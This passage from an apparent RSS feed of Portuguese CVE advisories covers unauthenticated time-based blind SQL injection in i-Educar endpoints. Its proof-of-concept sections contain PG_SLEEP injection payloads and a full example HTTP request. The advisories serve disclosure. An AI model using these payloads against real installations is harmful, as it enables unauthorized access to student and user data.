&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 24 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10844</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10844/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10844/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10844-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-modulecadastroaluno&amp;#34;&amp;gt;CVE-2025-10844: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10844&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10844&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10844-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-modulecadastroaluno&amp;#34;&amp;gt;CVE-2025-10844: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10844&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10844&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND 9581=(SELECT 9581 FROM PG_SLEEP(5)) AND &amp;amp;#39;bffB&amp;amp;#39;=&amp;amp;#39;bffB
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Cadastro/aluno?id=208%27%20AND%209581=(SELECT%209581%20FROM%20PG_SLEEP(5))%20AND%20%27bffB%27=%27bffB HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost:8086
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Not)A;Brand&amp;amp;#34;;v=&amp;amp;#34;8&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;138&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Chrome/138.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;text/html,application/xhtml&#43;xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;q=0.8,application/signed-exchange;v=b3;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;requisição-normal&amp;#34;&amp;gt;Requisição normal:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10844/image.png&amp;#34;
	width=&amp;#34;1041&amp;#34;
	height=&amp;#34;564&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10844/image_hu_6d08bd4f212812a8.png 480w, /p/cve-2025-10844/image_hu_d5ec1ad3473d1422.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;184&amp;#34;
		data-flex-basis=&amp;#34;442px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;requisição-modificada&amp;#34;&amp;gt;Requisição modificada:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10844/image-1.png&amp;#34;
	width=&amp;#34;1043&amp;#34;
	height=&amp;#34;561&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10844/image-1_hu_f74db5399c68b638.png 480w, /p/cve-2025-10844/image-1_hu_69ad34c8b657c13.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;446px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10844.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10844.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 23 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10845</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10845/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10845/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10845-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-modulecomponentecurricularview&amp;#34;&amp;gt;CVE-2025-10845: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10845&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10845&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10845-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-modulecomponentecurricularview&amp;#34;&amp;gt;CVE-2025-10845: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10845&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10845&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND &amp;amp;#39;QDaZ&amp;amp;#39;=&amp;amp;#39;QDaZ
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
